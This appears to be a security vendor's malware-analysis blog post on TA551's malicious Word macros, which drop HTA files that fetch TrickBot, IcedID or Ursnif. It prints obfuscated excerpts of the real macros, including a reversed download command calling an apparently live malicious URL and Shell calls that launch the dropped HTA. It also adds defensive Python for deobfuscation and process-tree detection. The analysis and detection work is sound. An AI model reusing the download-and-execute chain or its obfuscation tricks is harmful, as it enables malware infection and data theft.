The ASEC analysis team has been continuously updating the blog with information on malicious macro files and has been urging users to take caution. This post introduces a type of Word macro file recently distributed by the attack group TA551, which changes on average about once a week.
To distribute malware, the group usually sends documents containing malicious macros by email. The way the DOC file operates has not changed: once the macro is enabled, it drops an HTA file, which then downloads additional malware. The key change is in the types of malware that are downloaded at the final stage.
The following explains how the malicious macro in the diagram above works.
The attacker sends an email with a malicious MS Word document attached. When the recipient opens the email, downloads the attachment, and enables the macro, the malicious HTA file is dropped. Code inside the HTA file downloads additional malware from an external URL. If the URL is still valid, the final malware the attacker intended to distribute is downloaded and begins to run.
The names of the malicious DOC files used this time to distribute TrickBot, and of the dropped HTA files (which are the same as the names of the DLL files), are listed in the table above.
The purpose of distributing TrickBot has not changed much, and the same is true of the way the macro code operates across the altered malicious macro files that the TA551 group keeps using. Since last year, TA551 has steadily distributed IcedID; the notable change is that the final malware downloaded now varies slightly.
[document.xml] – excerpt
eslaF ,"huDSHMPsgn=hcraes&xt6X4fLT=di&BPHSK=resu&sSW7qpNxMucIcoxFPTJ=jibxO&00oYo19C=hcraes&9vGttM=dic&64BBY6eIrpNf1DyB=XhF&hSlYk=resu?1uzam/NpGbPSg3Ddn55UEAB0gi62SxY3C48ybaZA/sFOKURIghF2uY7XcTM6FrDEGxffw/adda/moc.grebotcotseb//:ptth" ,"TEG" nepO.ptthlmx
2 ,"gpj.neercSnoitpac\atadmargorp\:c" eliFoTevaS.maerts
[Macro Code] – excerpt
Attribute VB_Name = "listboxArray"
Function templateCCurr(removeDocClass)
    ' Runs "explorer c:\programdata\vbaQueryCount.hta" via Shell
    Debug.Print Shell("" + genericLnkResponse("explorer "))
End Function
Function genericLnkResponse(removeDocClass, Optional dateLibsW = "c:\progra", Optional btnLocal = "ta")
    ' The path is split into fragments so that no single string literal reveals it
    genericLnkResponse = removeDocClass & dateLibsW & "mdata\vbaQueryCount.h" & btnLocal
End Function
Function initTitle(arr As Variant)
    ' Decodes a byte array by XOR-ing each element with 100
    Dim out As String
    out = ""
    For cnt = 1 To UBound(arr)
        out = out & Chr(arr(cnt) Xor 100)
    Next
    initTitle = out
End Function
Attribute VB_Name = "captionO"
Function lnkObject(queryArray)
    ' Runs "cmd /c c:\\users\\public\\winSelBefore.hta" via Shell
    Shell singleLocal("cmd /c ")
End Function
Function singleLocal(queryArray, Optional listboxLng = "c:\\users\\public\\winSelBefore.h", Optional oOSize = "t", Optional optionDRef = "a")
    ' The path is split into fragments so that no single string literal reveals it
    singleLocal = queryArray & listboxLng & "" & oOSize & optionDRef
End Function
Function indexDocTmp(arr As Variant)
    ' Decodes a byte array by XOR-ing each element with 101
    Dim out As String
    out = vbNullChar
    For cnt = 1 To UBound(arr)
        out = out & Chr(arr(cnt) Xor 101)
    Next
    indexDocTmp = out
End Function
Looking at the macro code of each version that shows changes, we can see the same pattern: the macro uses internal data from the already-obfuscated document.xml object and creates an HTA file that is obfuscated a second time. A simple sample shows that the way the commands that execute the HTA file are combined may change slightly. In certain types, the data inside document.xml is simply stored with the text order reversed, as shown above.
A recently distributed sample shows that when the macro is enabled in the Word file containing the malicious macro (Figure 2), the HTA file in Figure 3 is dropped to the C:\ProgramData path. Deobfuscating part of the code inside the HTA file reveals the following code, which downloads additional malware (vbaQueryCount.jpg) from the external malicious URL and saves it to the C:\Users\Public path. The downloaded jpg file is not an image but the DLL malware, which is executed with regsvr32.exe.
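The two obfuscation layers described above (text stored back-to-front in document.xml, and byte arrays decoded with `Chr(arr(cnt) Xor 100)` or `Xor 101` in the macro) are simple enough that an analyst can undo them with a few lines of code. The following is an added example written for this post, not code from ASEC or from the sample: it reverses lines that contain reversed VBScript tokens, pulls URLs and paths out of the result, and decodes an XOR byte array with a known key or by trying every single-byte key. The marker list, the `example.invalid` URL and the XOR array are constructed assumptions; the second sample line mirrors the `stream.SaveToFile` excerpt shown above.

```python
import re

# Reversed VBScript/VBA tokens that give away a text-reversed payload. The first two
# appear reversed in the document.xml excerpt above; the full list is an assumption.
REVERSED_MARKERS = ("nepO.ptthlmx", "eliFoTevaS", "tcejbOetaerC", "llehS")


def looks_reversed(line: str) -> bool:
    """True if the line contains a known VBScript token written backwards."""
    return any(marker in line for marker in REVERSED_MARKERS)


def unreverse(line: str) -> str:
    """Layer 1: the document stores text back-to-front; undo it."""
    return line[::-1]


def decode_xor_array(values, key: int) -> str:
    """Layer 2: mirror of the macro's initTitle/indexDocTmp loop, Chr(v Xor key)."""
    return "".join(chr(v ^ key) for v in values)


def guess_xor_keys(values):
    """General form: try every single-byte key, keep those yielding printable ASCII."""
    candidates = []
    for key in range(256):
        text = decode_xor_array(values, key)
        if all(32 <= ord(c) < 127 for c in text):
            candidates.append((key, text))
    return candidates


def extract_iocs(text: str) -> dict:
    """Pull URLs and Windows paths out of deobfuscated text for blocking and hunting."""
    return {
        "urls": re.findall(r'https?://[^\s"\']+', text),
        "paths": re.findall(r'[A-Za-z]:\\[^\s"\']+', text),
    }


def analyse_docxml(lines):
    """Reverse every line that looks reversed, then collect indicators from the result."""
    decoded = [unreverse(line) if looks_reversed(line) else line for line in lines]
    return decoded, extract_iocs("\n".join(decoded))


# Constructed sample in the same shape as the document.xml excerpt; the URL is a
# placeholder, not the indicator from the real sample.
SAMPLE_DOCXML = [
    'eslaF ,"1=di?atad/dilavni.elpmaxe//:ptth" ,"TEG" nepO.ptthlmx',
    '2 ,"gpj.neercSnoitpac\\atadmargorp\\:c" eliFoTevaS.maerts',
]

# Constructed byte array encoded the way indexDocTmp expects (Xor 101).
SAMPLE_XOR_ARRAY = [23, 0, 2, 22, 19, 23, 86, 87]

if __name__ == "__main__":
    decoded_lines, iocs = analyse_docxml(SAMPLE_DOCXML)
    for line in decoded_lines:
        print(line)
    print(iocs)
    print(decode_xor_array(SAMPLE_XOR_ARRAY, 101))
    print(guess_xor_keys(SAMPLE_XOR_ARRAY)[:5])
```

The key brute-force deliberately returns every key that produces printable text rather than one answer; in practice an analyst filters the candidates for tokens they expect (a drive letter, `http`, an executable name) before trusting a decoded string.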
TrickBot is the malware ultimately downloaded; it attempts malicious behaviors such as stealing sensitive information (web browser data, financial transaction data) from the user's PC. As shown in Figure 8 (a process tree provided by AhnLab RAPIT, the malware auto-analysis infrastructure), the malware collects information about the infected PC using normal processes such as ipconfig.exe, net.exe, and nltest.exe.
The recent trend shows that the malware that ultimately runs has changed to financial information-stealing malware. The download types observed are:
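The execution chain described in this post (Word macro, then `explorer`/`cmd` launching the dropped HTA from C:\ProgramData, then regsvr32.exe loading a .jpg from C:\Users\Public, then recon via ipconfig/net/nltest) is exactly what a process-creation log exposes. The following is an added example for this post, not ASEC's or RAPIT's detection logic: four rules run over a constructed process tree. The event records, the rule names, and the simplified parentage (explorer.exe shown as the direct parent of mshta.exe) are assumptions; the file names come from the macro and HTA excerpts above.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record, in the shape of a Sysmon event ID 1."""
    pid: int
    ppid: int
    image: str
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
LAUNCHERS = {"cmd.exe", "explorer.exe", "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
RECON_TOOLS = {"ipconfig.exe", "net.exe", "net1.exe", "nltest.exe", "whoami.exe"}
DROP_DIRS = ("c:\\programdata\\", "c:\\users\\public\\")  # paths used by the sample above


def image_name(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events):
    """Return (rule, pid) pairs for the behaviours described in the post."""
    by_pid = {e.pid: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e)

    hits = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else ""
        cmd = e.cmdline.lower()

        # Rule 1: an Office application spawning a shell/launcher (the macro's Shell("explorer ...")).
        if parent_name in OFFICE_APPS and name in LAUNCHERS:
            hits.append(("office_spawns_launcher", e.pid))

        # Rule 2: mshta.exe running content out of a world-writable drop directory.
        if name == "mshta.exe" and any(d in cmd for d in DROP_DIRS):
            hits.append(("mshta_from_drop_dir", e.pid))

        # Rule 3: regsvr32.exe given a file whose extension is not a COM DLL (.jpg here).
        if name == "regsvr32.exe":
            for arg in cmd.split()[1:]:
                if not arg.startswith("/") and "." in arg and arg.rsplit(".", 1)[-1] not in ("dll", "ocx"):
                    hits.append(("regsvr32_nonstandard_ext", e.pid))
                    break

        # Rule 4: a non-shell process spawning two or more distinct recon tools.
        recon = {image_name(c.image) for c in children[e.pid]} & RECON_TOOLS
        if len(recon) >= 2 and name not in LAUNCHERS:
            hits.append(("recon_burst", e.pid))
    return hits


# Constructed process tree modelled on the chain in this post, plus one benign branch.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE /n invoice.doc"),
    ProcEvent(101, 100, r"C:\Windows\explorer.exe", r"explorer c:\programdata\vbaQueryCount.hta"),
    ProcEvent(102, 101, r"C:\Windows\System32\mshta.exe", r"mshta c:\programdata\vbaQueryCount.hta"),
    ProcEvent(103, 102, r"C:\Windows\System32\regsvr32.exe", r"regsvr32 c:\users\public\vbaQueryCount.jpg"),
    ProcEvent(104, 103, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ProcEvent(105, 103, r"C:\Windows\System32\net.exe", "net view /all"),
    ProcEvent(106, 103, r"C:\Windows\System32\nltest.exe", "nltest /domain_trusts"),
    ProcEvent(200, 1, r"C:\Windows\System32\cmd.exe", "cmd"),           # an admin's shell
    ProcEvent(201, 200, r"C:\Windows\System32\ipconfig.exe", "ipconfig"),  # single benign lookup
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:28s} pid={pid} {SAMPLE_EVENTS[[e.pid for e in SAMPLE_EVENTS].index(pid)].cmdline}")
```

Rule 4 is the one that generalises beyond this sample: an interactive shell running `ipconfig` is everyday noise, but a DLL host such as regsvr32.exe fanning out into several recon tools within one tree is the TrickBot behaviour in Figure 8, so the rule keys on the parent's identity and the variety of children rather than on any single command.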
- IcedID download type
- Ursnif download type
- TrickBot download type
Users should refrain from opening emails from unknown sources and should not run or enable macros in downloaded attachments. If the security level of the document program is set to low, macros may run automatically without any notification. Therefore, users should keep the security level high to prevent unintended features from running.
Users are also advised to update their anti-malware engine pattern to the latest version.
AhnLab's anti-malware product, V3, detects and blocks the types of malicious files introduced in this post (DOC, HTA, DLL, etc.) using the following aliases.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.